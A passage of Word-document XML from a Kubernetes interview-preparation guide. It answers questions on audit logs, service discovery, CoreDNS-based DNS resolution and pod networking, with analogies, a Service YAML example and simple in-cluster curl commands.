        <w:t xml:space="preserve">               * Audit logs = CCTV + visitor register recording every entry, exit, and action inside the building</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Strong security visibility</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Helps forensic analysis</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Required for compliance</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Centralized activity tracking</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Works at API level (complete coverage)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Can generate large volume of logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Needs external storage/aggregation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Requires careful policy tuning</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * May impact performance if overly verbose</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Log only necessary levels (avoid full RequestResponse in prod unless needed)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Send logs to centralized system (SIEM)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Secure audit log storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Regularly review suspicious activity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use retention policies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Kubernetes audit logs are a security mechanism that records all API server requests, capturing detailed information about user actions, resources accessed, and request metadata to provide visibility, compliance support, and forensic capabilities within a Kubernetes cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q333. What is service discovery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Service discovery in Kubernetes is the mechanism that allows applications (Pods) to automatically find and communicate with each other without needing hardcoded IP addresses.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Service discovery means: “How does one service find another service in a dynamic environment?”</w:t>
        <w:br/>
        <w:t>In Kubernetes, Pod IPs change frequently, so service discovery provides a stable way to locate services.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why service discovery is needed</w:t>
        <w:br/>
        <w:t>In a distributed system:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods are ephemeral (can die and restart)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * IP addresses constantly change</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Scaling adds/removes instances dynamically</w:t>
        <w:br/>
        <w:t>So we need:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Stable naming</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Automatic routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Load balancing across instances</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Kubernetes solves service discovery</w:t>
        <w:br/>
        <w:t>Kubernetes provides service discovery using:</w:t>
        <w:br/>
        <w:t>1. Services (stable endpoint)</w:t>
        <w:br/>
        <w:t>A Service provides a fixed virtual IP (ClusterIP) and DNS name.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. CoreDNS (DNS-based discovery)</w:t>
        <w:br/>
        <w:t>Pods can discover services using DNS names.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>my-service.default.svc.cluster.local</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Service discovery flow</w:t>
        <w:br/>
        <w:t>Pod A → DNS (CoreDNS) → Service → Pod IPs (Endpoints)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pod requests a service name</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * DNS resolves it</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes routes traffic to healthy Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of service discovery in Kubernetes</w:t>
        <w:br/>
        <w:t>1. DNS-based discovery (most common)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Uses CoreDNS</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Resolves service names to ClusterIP</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>my-service.default.svc.cluster.local → 10.96.1.10</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Environment variable-based discovery</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes injects service details as env vars</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>MY_SERVICE_SERVICE_HOST=10.96.1.10</w:t>
        <w:br/>
        <w:t>MY_SERVICE_SERVICE_PORT=80</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key Kubernetes components involved</w:t>
        <w:br/>
        <w:t>1. Service</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Stable virtual IP</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Load balances traffic</w:t>
        <w:br/>
        <w:t>2. CoreDNS</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Resolves service names to IPs</w:t>
        <w:br/>
        <w:t>3. kube-proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Routes traffic to actual Pod endpoints</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Service definition:</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Service</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: backend</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  selector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    app: backend</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - port: 80</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pod uses:</w:t>
        <w:br/>
        <w:t>curl http://backend</w:t>
        <w:br/>
        <w:t>Kubernetes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Resolves “backend” via DNS</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Forwards request to one of the backend Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods = employees (move frequently between desks)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Service = office phone number (never changes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * DNS = directory assistance</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Service discovery = system that ensures calls always reach the right employee</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Service discovery vs load balancing</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service Discovery</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Load Balancing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Find services</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Distribute traffic</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Focus</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Naming &amp; lookup</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Traffic routing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes tool</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CoreDNS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-proxy / service</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No hardcoded IPs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Automatic scaling support</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * High availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Simplifies microservices communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Works seamlessly with Kubernetes networking</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * DNS caching delays</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Debugging routing issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Complex in multi-cluster setups</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Requires correct service configuration</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Always use service DNS names, not Pod IPs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use readiness probes for accurate routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Avoid direct IP communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use headless services for stateful apps if needed</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Monitor CoreDNS health</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Service discovery in Kubernetes is the mechanism that enables Pods and applications to dynamically locate and communicate with each other using stable service names and DNS resolution through CoreDNS, while abstracting away changing Pod IPs and ensuring reliable communication in a dynamic, scalable microservices environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q334. Explain DNS resolution in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DNS resolution in Kubernetes is the process by which Pods convert service names into IP addresses so they can communicate with each other without using hardcoded IPs.</w:t>
        <w:br/>
        <w:t>This is handled mainly by CoreDNS inside the cluster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>DNS resolution in Kubernetes = translating service names into ClusterIP or Pod IPs so services can talk to each other reliably.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why DNS resolution is needed</w:t>
        <w:br/>
        <w:t>In Kubernetes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods are ephemeral (IP changes frequently)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Services provide stable names</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Applications should not depend on raw IPs</w:t>
        <w:br/>
        <w:t>So DNS provides:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Stable service discovery</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Automatic routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Human-readable service names</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How DNS resolution works in Kubernetes</w:t>
        <w:br/>
        <w:t>Step-by-step flow:</w:t>
        <w:br/>
        <w:t>Pod → DNS request → CoreDNS → Service lookup → ClusterIP → kube-proxy → Pod IP</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Service:</w:t>
        <w:br/>
        <w:t>name: backend</w:t>
        <w:br/>
        <w:t>namespace: default</w:t>
        <w:br/>
        <w:t>DNS name:</w:t>
        <w:br/>
        <w:t>backend.default.svc.cluster.local</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>DNS structure in Kubernetes</w:t>
        <w:br/>
        <w:t>&lt;service&gt;.&lt;namespace&gt;.svc.cluster.local</w:t>
        <w:br/>
        <w:t>Breakdown:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * service → service name</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * namespace → namespace of service</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * svc → service domain</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * cluster.local → default cluster domain</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What happens when a Pod calls a service</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>curl http://backend</w:t>
        <w:br/>
        <w:t>Internally:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Pod sends DNS query for backend</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. CoreDNS receives request</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. CoreDNS finds matching Service</w:t>
        <w:br/>
        <w:t xml:space="preserve">               4. Returns ClusterIP (e.g., 10.96.1.10)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. Request goes to kube-proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               6. kube-proxy routes to one of the Pod endpoints</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of DNS records in Kubernetes</w:t>
        <w:br/>
        <w:t>1. Service DNS (ClusterIP)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Resolves service name → ClusterIP</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Headless service DNS</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Resolves directly to Pod IPs</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>pod-1.backend.default.svc.cluster.local → 10.244.1.10</w:t>
        <w:br/>
        <w:t>pod-2.backend.default.svc.cluster.local → 10.244.1.11</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Pod DNS (rare)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Individual Pod hostname resolution</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CoreDNS role</w:t>
        <w:br/>
        <w:t>CoreDNS:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Runs as a Deployment in kube-system</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Watches Kubernetes API</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Automatically updates DNS records</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>DNS configuration in Pod</w:t>
        <w:br/>
        <w:t>Inside a Pod:</w:t>
        <w:br/>
        <w:t>cat /etc/resolv.conf</w:t>
        <w:br/>
        <w:t>Example output:</w:t>
        <w:br/>
        <w:t>nameserver 10.96.0.10</w:t>
        <w:br/>
        <w:t>search default.svc.cluster.local svc.cluster.local cluster.local</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Search domains</w:t>
        <w:br/>
        <w:t>Kubernetes adds search paths so you can use short names:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * backend → backend.default.svc.cluster.local</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * backend.default → full resolution</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>DNS resolution types</w:t>
        <w:br/>
        <w:t>1. Cluster-local DNS</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Internal communication inside cluster</w:t>
        <w:br/>
        <w:t>2. External DNS (optional integration)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Resolves external domains (e.g., google.com)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods = people in a large office</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Services = department names</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CoreDNS = internal directory/phonebook</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * DNS resolution = looking up a department name to get the extension number</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>DNS vs Service discovery</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>DNS Resolution</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service Discovery</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Focus</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Name → IP mapping</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Finding services</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Tool</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CoreDNS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service + CoreDNS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Network layer</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Application layer</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No hardcoded IPs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Automatic updates when Pods change</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Simple service communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Works across namespaces</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Supports microservices architecture</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * DNS caching delays</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Debugging resolution issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Misconfigured CoreDNS can break cluster communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Headless service complexity</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Always use service DNS names</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Monitor CoreDNS performance</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Avoid relying on Pod IPs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use headless services only when needed</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Configure proper DNS policies if required</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>DNS resolution in Kubernetes is the process of converting service names into ClusterIP or Pod IP addresses using CoreDNS, enabling dynamic service discovery and communication between Pods without relying on static IPs in a highly scalable and distributed environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q335. What is pod networking?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pod networking in Kubernetes is the network model that allows every Pod to get its own unique IP address and communicate directly with other Pods, Services, and external systems across the cluster.</w:t>
        <w:br/>
        <w:t>It is one of the core design principles of Kubernetes networking.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>In Kubernetes, every Pod gets its own IP, and all Pods can talk to each other without NAT by default.</w:t>
        <w:br/>
        <w:t>This is often called the “flat networking model.”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why pod networking is needed</w:t>
        <w:br/>
        <w:t>In a cluster:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods are created/destroyed dynamically</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Nodes are distributed across networks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Containers inside Pods need communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Services must route traffic to Pods</w:t>
        <w:br/>
        <w:t>So Kubernetes needs a consistent networking model.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes networking model (CNI-based)</w:t>
        <w:br/>
        <w:t>Pod networking is implemented using the Container Network Interface.</w:t>
        <w:br/>
        <w:t>CNI plugins handle:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * IP assignment</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cross-node communication</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key properties of Pod networking</w:t>
        <w:br/>
        <w:t>1. Each Pod gets a unique IP</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No two Pods share the same IP</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * IP is cluster-wide unique</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Pod-to-Pod communication (no NAT)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods can directly talk using IPs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Works across nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Flat network model</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No separate virtual networks per node</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * All Pods are part of one network space</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How pod networking works</w:t>
        <w:br/>
        <w:t>Pod A (Node 1) → CNI Plugin → Network Overlay → Pod B (Node 2)</w:t>
        <w:br/>
        <w:t>Flow:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Pod is created</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. kubelet calls CNI plugin</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. CNI assigns IP to Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">               4. Routes are configured</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. Pod becomes reachable</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Pod A:</w:t>
        <w:br/>
        <w:t>10.244.1.10</w:t>
        <w:br/>
        <w:t>Pod B:</w:t>
        <w:br/>
        <w:t>10.244.2.20</w:t>
        <w:br/>
        <w:t>Pod A can directly:</w:t>
        <w:br/>
        <w:t>curl http://10.244.2.20</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Role of CNI plugins</w:t>
        <w:br/>
        <w:t>Different CNI plugins implement pod networking:</w:t>
        <w:br/>
        <w:t>Common examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Calico</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Flannel</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Weave Net</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cilium</w:t>
        <w:br/>
        <w:t>Each handles:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * IP allocation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Routing rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network policies (security)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pod networking with Services</w:t>
        <w:br/>
        <w:t>Pods are accessed via Services:</w:t>
        <w:br/>
        <w:t>Pod → Service (ClusterIP) → kube-proxy → Target Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Network flow inside Kubernetes</w:t>
        <w:br/>
        <w:t>Pod → CNI → Node network → Other Node → Target Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods = houses</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pod IP = house address</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CNI = road construction system</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes cluster = city</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pod networking = system that ensures every house can directly reach every other house without confusion</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pod networking vs Service networking</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod Networking</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service Networking</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low-level (IP-based)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High-level (abstraction)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Identity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod IP</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service name</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Ephemeral</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Direct communication</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Load-balanced access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Simple communication model</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No NAT inside cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easy service discovery integration</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Scales across nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Works with distributed systems</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Requires CNI setup</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Debugging cross-node traffic issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network policy complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Overlay network overhead in some plugins</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use standard CNI plugins (Calico/Cilium)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Avoid direct Pod IP usage in apps</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use Services for stable access</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Enable Network Policies for security</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Monitor network latency between nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Pod networking in Kubernetes is a cluster networking model where each Pod is assigned a unique IP address and can communicate directly with other Pods across nodes without NAT, implemented using CNI plugins to ensure seamless, scalable, and flat network connectivity within the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
